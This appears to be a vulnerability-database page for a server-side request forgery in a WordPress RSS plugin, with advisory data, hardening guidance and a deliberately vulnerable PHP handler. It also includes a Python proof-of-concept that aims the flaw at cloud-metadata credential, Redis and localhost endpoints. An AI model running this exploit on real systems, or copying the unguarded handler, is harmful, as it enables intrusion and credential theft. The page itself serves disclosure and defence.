Security Vulnerability Report
CVE-2025-11917 CVSS 6.4 MEDIUM

CVE-2025-11917

Published: 2025-11-05 07:15:32
Last Modified: 2026-04-15 00:35:42

Description

The WPeMatico RSS Feed Fetcher plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.8.11 via the wpematico_test_feed() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.
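The handler shape that produces this class of bug, next to a hardened version, as an added example written for this page (illustrative code, not the WPeMatico plugin's own source; the function, action and parameter names wpx_test_feed_vuln, wpx_test_feed_safe, feed_url and wpx_test_feed_nonce are assumptions, and the real handler may differ in details beyond what the description states):

```php
<?php
// Added example, not code from the WPeMatico plugin or the NVD record.
// A WordPress admin-ajax "test this feed" action is reachable by every
// logged-in user (the wp_ajax_{action} hook fires for any role), so the
// handler itself must enforce authorization and must not fetch arbitrary URLs.
// All names below are illustrative assumptions.

// --- Vulnerable pattern: no capability check, no nonce, raw fetch, body echoed ---
// Any Subscriber can POST action=wpx_test_feed_vuln&feed_url=http://169.254.169.254/
function wpx_test_feed_vuln() {
    $url  = isset( $_POST['feed_url'] ) ? $_POST['feed_url'] : '';
    $resp = wp_remote_get( $url );  // reject_unsafe_urls is off: internal hosts allowed
    wp_send_json( array( 'body' => wp_remote_retrieve_body( $resp ) ) );
}
add_action( 'wp_ajax_wpx_test_feed_vuln', 'wpx_test_feed_vuln' );

// --- Hardened pattern -------------------------------------------------------------
function wpx_test_feed_safe() {
    // 1. CSRF: the request must carry a nonce minted for this action (dies otherwise).
    check_ajax_referer( 'wpx_test_feed_nonce', 'nonce' );

    // 2. Authorization: restrict to users who may manage campaigns (assumed: admins).
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'insufficient privileges' ), 403 );
    }

    // 3. Input: unslash, then normalise to a URL string.
    $url = isset( $_POST['feed_url'] ) ? esc_url_raw( wp_unslash( $_POST['feed_url'] ) ) : '';

    // 4. Scheme allow-list: feeds are http(s) only; file://, gopher://, ftp:// are rejected.
    $scheme = wp_parse_url( $url, PHP_URL_SCHEME );
    if ( ! in_array( $scheme, array( 'http', 'https' ), true ) ) {
        wp_send_json_error( array( 'message' => 'only http/https feeds are allowed' ), 400 );
    }

    // 5. Explicit link-local check. Core's wp_http_validate_url() (used in step 6)
    //    rejects loopback, 0/8, 10/8, 172.16/12 and 192.168/16; whether it also
    //    covers 169.254.0.0/16 depends on the core version, so check it here.
    $host = wp_parse_url( $url, PHP_URL_HOST );
    $ip   = gethostbyname( (string) $host );  // returns the name unchanged if unresolvable
    if ( filter_var( $ip, FILTER_VALIDATE_IP ) && 0 === strpos( $ip, '169.254.' ) ) {
        wp_send_json_error( array( 'message' => 'link-local targets are not allowed' ), 400 );
    }

    // 6. SSRF guard: wp_safe_remote_get() sets reject_unsafe_urls, so WordPress
    //    resolves the host, refuses private/loopback ranges and non-standard ports,
    //    and re-validates each redirect target. Cap redirects and the timeout.
    $resp = wp_safe_remote_get( $url, array( 'timeout' => 10, 'redirection' => 2 ) );
    if ( is_wp_error( $resp ) ) {
        wp_send_json_error( array( 'message' => $resp->get_error_message() ), 400 );
    }

    // 7. Do not reflect the raw body; report only what the UI needs.
    wp_send_json_success( array(
        'status'       => wp_remote_retrieve_response_code( $resp ),
        'content_type' => wp_remote_retrieve_header( $resp, 'content-type' ),
    ) );
}
add_action( 'wp_ajax_wpx_test_feed_safe', 'wpx_test_feed_safe' );
```

The three controls map onto the advisory: the nonce stops cross-site triggering, the capability check removes Subscriber-level reach, and wp_safe_remote_get() stops the server from being pointed at internal services. Two caveats worth testing on a real site: wp_http_validate_url() resolves the hostname before the fetch, so a DNS-rebinding target can pass the check and resolve elsewhere a moment later (an egress allow-list or a pinned resolver is the stronger control); and it skips the private-range check when the target host equals the site's own host, and honours the http_request_host_is_external filter, so another plugin can silently re-enable internal targets.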

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No CPE configuration data is available in the NVD record. Affected range, per the description above:

WPeMatico RSS Feed Fetcher <= 2.8.11 (all versions up to and including 2.8.11)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-11917 - WPeMatico SSRF PoC
Author: Security Researcher
Note: For authorized testing only
"""
import sys

import requests

TARGET_URL = "http://target-wordpress-site.com"
LOGIN_URL = f"{TARGET_URL}/wp-login.php"
SSRF_URL = f"{TARGET_URL}/wp-admin/admin-ajax.php"


def login(session, username, password):
    """Login to WordPress with a subscriber account."""
    data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1',
    }
    session.post(LOGIN_URL, data=data)
    # WordPress names the auth cookie wordpress_logged_in_<hash>, so match on
    # the prefix rather than on an exact key.
    return any(name.startswith('wordpress_logged_in')
               for name in session.cookies.get_dict())


def exploit_ssrf(session, target_host="http://169.254.169.254/latest/meta-data/"):
    """Exploit SSRF via the wpematico_test_feed() function.

    The AJAX action and parameter names below are those used by this PoC;
    compare them against the plugin source linked in the references before
    relying on them.
    """
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    # Payload for SSRF - the feed URL is pointed at an internal service
    data = {
        'action': 'wpematico_test_feed',
        'feed_url': target_host,  # SSRF payload
        'campaign_id': '0',
    }
    try:
        response = session.post(SSRF_URL, data=data, headers=headers, timeout=10)
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response Length: {len(response.text)}")
        # A 200 from admin-ajax.php only shows the handler ran; inspect the
        # body to confirm the internal service actually answered.
        if response.status_code == 200:
            print("[+] SSRF Successful - Response:")
            print(response.text[:500])
            return True
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
    return False


if __name__ == "__main__":
    print("CVE-2025-11917 WPeMatico SSRF Exploit")
    print("=" * 50)
    session = requests.Session()
    # Login with subscriber account
    if not login(session, "subscriber_user", "password"):
        print("[-] Login failed")
        sys.exit(1)
    print("[+] Logged in successfully")
    # Test SSRF against various targets
    targets = [
        "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
        "http://10.0.0.1:6379/",
        "http://localhost:8080/admin",
        "http://internal-db.local:3306/",
    ]
    for target in targets:
        print(f"\n[*] Testing target: {target}")
        exploit_ssrf(session, target_host=target)

References

https://github.com/etruel/wpematico/commit/7a281dcfc0868490d62caee54f3b743708fed7cf (commit in the etruel/wpematico repository)
https://plugins.trac.wordpress.org/browser/wpematico/tags/2.8.11/app/campaign_edit.php#L24 (plugin source, 2.8.11 tag)
https://plugins.trac.wordpress.org/browser/wpematico/tags/2.8.11/app/wpematico_functions.php#L1249 (plugin source, 2.8.11 tag)
https://plugins.trac.wordpress.org/browser/wpematico/tags/2.8.11/app/wpematico_functions.php#L1260 (plugin source, 2.8.11 tag)
https://www.wordfence.com/threat-intel/vulnerabilities/id/5a1c6377-c2a7-4344-86bd-d2797db19469?source=cve (Wordfence advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-11917",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-05T07:15:32.073",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The WPeMatico RSS Feed Fetcher plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.8.11 via the wpematico_test_feed() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
            "baseScore": 6.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.1,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-918"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/etruel/wpematico/commit/7a281dcfc0868490d62caee54f3b743708fed7cf",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/wpematico/tags/2.8.11/app/campaign_edit.php#L24",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/wpematico/tags/2.8.11/app/wpematico_functions.php#L1249",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/wpematico/tags/2.8.11/app/wpematico_functions.php#L1260",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5a1c6377-c2a7-4344-86bd-d2797db19469?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}